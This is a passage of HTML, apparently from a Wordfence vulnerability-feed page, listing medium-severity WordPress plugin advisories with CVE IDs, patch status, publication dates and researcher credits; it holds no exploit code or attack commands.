<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments" target="_blank" rel="noopener">Easy Appointments</a> <span class="wfvr-software-slug">[easy-appointments]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phyo-ko-ko" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/51a3cddbc5b4b4bda2364dff4f57dfed.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="51a3cddbc5b4b4bda2364dff4f57dfed"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phyo-ko-ko" target="_blank" rel="noopener">Phyo Ko Ko</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/19544e08-fa14-4251-bcc2-e46ebccca075" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8cffcb34-4d35-4e1e-bc0a-53a41bc91e87" target="_blank" rel="noopener">Easy Appointments &lt;= 3.12.26 &#8211; Authenticated (Subscriber+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14223" target="_blank" rel="noopener noreferrer">							CVE-2026-14223						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments" target="_blank" rel="noopener">Easy Appointments</a> <span class="wfvr-software-slug">[easy-appointments]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mark-moore" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/391706731077de4a1e991524d6b9c870.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="391706731077de4a1e991524d6b9c870"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mark-moore" target="_blank" rel="noopener">Mark Moore</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8cffcb34-4d35-4e1e-bc0a-53a41bc91e87" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bb175149-05b5-4e8e-8437-9a07762c7269" target="_blank" rel="noopener">Easy Appointments &lt;= 3.12.26 &#8211; Authenticated (Subscriber+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14224" target="_blank" rel="noopener noreferrer">							CVE-2026-14224						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments" target="_blank" rel="noopener">Easy Appointments</a> <span class="wfvr-software-slug">[easy-appointments]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duy-khanh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2cd055dd6c3bc3b1292e85a8a8a0cfd9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2cd055dd6c3bc3b1292e85a8a8a0cfd9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duy-khanh" target="_blank" rel="noopener">Duy Tran</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bb175149-05b5-4e8e-8437-9a07762c7269" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6c67aefd-5da3-437e-bd7b-1f4dbea3130f" target="_blank" rel="noopener">Easy Appointments &lt;= 3.12.26 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14222" target="_blank" rel="noopener noreferrer">							CVE-2026-14222						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments" target="_blank" rel="noopener">Easy Appointments</a> <span class="wfvr-software-slug">[easy-appointments]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/wei-hsiang-wang" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ac6bf1005b916352d965412b8d10a2a5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ac6bf1005b916352d965412b8d10a2a5"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/wei-hsiang-wang" target="_blank" rel="noopener">WEI HSIANG WANG</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6c67aefd-5da3-437e-bd7b-1f4dbea3130f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/39e35136-a096-40d5-8d6e-2667e7b83aaa" target="_blank" rel="noopener">Easy Appointments &lt;= 3.12.26 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14221" target="_blank" rel="noopener noreferrer">							CVE-2026-14221						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments" target="_blank" rel="noopener">Easy Appointments</a> <span class="wfvr-software-slug">[easy-appointments]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/youssef-massoudi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/86d39645cda69d6da0e000d9158634e7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86d39645cda69d6da0e000d9158634e7"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/youssef-massoudi" target="_blank" rel="noopener">Youssef massoudi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/39e35136-a096-40d5-8d6e-2667e7b83aaa" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5f43e35e-55cd-45f1-b8a5-e47398d97cc2" target="_blank" rel="noopener">Event Booking Manager for WooCommerce &lt;= 5.3.7 &#8211; Missing Authorization to Authenticated (Contributor+) Site-Wide Payment Settings Modification via mep_save_payment_settings_modal AJAX Action</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17166" target="_blank" rel="noopener noreferrer">							CVE-2026-17166						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mage-eventpress" target="_blank" rel="noopener">Event Booking Manager for WooCommerce – Sell Tickets, Event Registration, RSVP &amp; Event Calendar</a> <span class="wfvr-software-slug">[mage-eventpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5f43e35e-55cd-45f1-b8a5-e47398d97cc2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/644e2267-c90b-4517-8ded-f2b7c7ec3d27" target="_blank" rel="noopener">Facturación Electrónica Costa Rica &lt;= 2.0.2 &#8211; Cross-Site Request Forgery to Plugin Settings Update</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-9720" target="_blank" rel="noopener noreferrer">							CVE-2026-9720						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/factura-electronica-cr" target="_blank" rel="noopener">Facturación Electrónica Costa Rica</a> <span class="wfvr-software-slug">[factura-electronica-cr]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/swat-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2400719fbf58ba13f3eda25084096ad3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2400719fbf58ba13f3eda25084096ad3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/swat-2" target="_blank" rel="noopener">swat</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/644e2267-c90b-4517-8ded-f2b7c7ec3d27" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d7184e6d-ae46-4725-b464-b9ccb5d518e1" target="_blank" rel="noopener">FundEngine &lt;= 1.7.8 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59560" target="_blank" rel="noopener noreferrer">							CVE-2026-59560						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-fundraising-donation" target="_blank" rel="noopener">FundEngine – Donation and Crowdfunding Platform</a> <span class="wfvr-software-slug">[wp-fundraising-donation]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/septio-noerdiansyah" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/78db0fddf357f7207a5574afee653e7d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="78db0fddf357f7207a5574afee653e7d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/septio-noerdiansyah" target="_blank" rel="noopener">Septio Noerdiansyah</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d7184e6d-ae46-4725-b464-b9ccb5d518e1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1ff5889e-b9fd-494f-b25d-78e85e94d34c" target="_blank" rel="noopener">FuseWP &lt;= 1.1.24.2 &#8211; Cross-Site Request Forgery to Sync Rule Status Toggle</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-5582" target="_blank" rel="noopener noreferrer">							CVE-2026-5582						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fusewp" target="_blank" rel="noopener">FuseWP – WordPress User Sync to Email List &amp; Marketing Automation (Mailchimp, Constant Contact, ActiveCampaign etc.)</a> <span class="wfvr-software-slug">[fusewp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/peb" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/687b1a67f8c4dd6f731d33a8b3b970d4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="687b1a67f8c4dd6f731d33a8b3b970d4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/peb" target="_blank" rel="noopener">Deadbee</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1ff5889e-b9fd-494f-b25d-78e85e94d34c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8cf507de-d003-43f3-9763-f1cff5508685" target="_blank" rel="noopener">Google Review Slider &lt;= 18.4 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66428" target="_blank" rel="noopener noreferrer">							CVE-2026-66428						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-google-places-review-slider" target="_blank" rel="noopener">WP Google Review Slider</a> <span class="wfvr-software-slug">[wp-google-places-review-slider]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8cf507de-d003-43f3-9763-f1cff5508685" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4987b1b1-0356-4bc0-a4d5-b9a07830c0d4" target="_blank" rel="noopener">Insert Headers and Footers Code – HT Script &lt;= 1.1.8 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66474" target="_blank" rel="noopener noreferrer">							CVE-2026-66474						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/insert-headers-and-footers-script" target="_blank" rel="noopener">Insert Headers and Footers Code – HT Script</a> <span class="wfvr-software-slug">[insert-headers-and-footers-script]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4987b1b1-0356-4bc0-a4d5-b9a07830c0d4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a420a8b5-e43e-4c0d-86f3-b35f11efdf46" target="_blank" rel="noopener">Jeg Kit for Elementor &lt;= 3.1.1 &#8211; Authenticated (Contributor+) Exposure of Sensitive Information via &#8216;JkitDashboardOption&#8217; Inline Script</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-2916" target="_blank" rel="noopener noreferrer">							CVE-2026-2916						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jeg-elementor-kit" target="_blank" rel="noopener">Jeg Kit for Elementor – Powerful Addons for Elementor, Widgets &amp; Templates for WordPress</a> <span class="wfvr-software-slug">[jeg-elementor-kit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/54998c6d0860cc6e1f5fee1e7efedb56.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="54998c6d0860cc6e1f5fee1e7efedb56"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener">Dmitrii Ignatyev</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a420a8b5-e43e-4c0d-86f3-b35f11efdf46" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/adecdae5-2cb9-42f3-befb-3f5dc73ed5dc" target="_blank" rel="noopener">Kadence Blocks — Page Builder Toolkit for Gutenberg Editor &lt;= 3.7.8 &#8211; Authenticated (Contributor+) Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66696" target="_blank" rel="noopener noreferrer">							CVE-2026-66696						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kadence-blocks" target="_blank" rel="noopener">Kadence Blocks — Page Builder Toolkit for Gutenberg Editor</a> <span class="wfvr-software-slug">[kadence-blocks]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem-cyberkareem" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4f2a3b32ba525d9a6cd33a222b91f5ec.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4f2a3b32ba525d9a6cd33a222b91f5ec"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem-cyberkareem" target="_blank" rel="noopener">Abdullah Kareem &#8220;cyberkareem&#8221;</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/adecdae5-2cb9-42f3-befb-3f5dc73ed5dc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f8deef7d-d755-489d-847a-64eecb13f7a6" target="_blank" rel="noopener">LifterLMS – WP LMS for eLearning, Online Courses, &amp; Quizzes &lt; 10.0.10 &#8211; Authenticated (Subscriber+) Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14231" target="_blank" rel="noopener noreferrer">							CVE-2026-14231						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lifterlms" target="_blank" rel="noopener">LifterLMS – WP LMS for eLearning, Online Courses, &amp; Quizzes</a> <span class="wfvr-software-slug">[lifterlms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daniel-pua-devploit" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9c1637c1901bf472307fb82f9ffe38a3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9c1637c1901bf472307fb82f9ffe38a3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daniel-pua-devploit" target="_blank" rel="noopener">Daniel Púa &#8211; devploit</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f8deef7d-d755-489d-847a-64eecb13f7a6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/95d9995a-d99e-4136-84f9-1d3dfc4a4bf0" target="_blank" rel="noopener">myCred &lt;= 3.1.2 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61968" target="_blank" rel="noopener noreferrer">							CVE-2026-61968						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
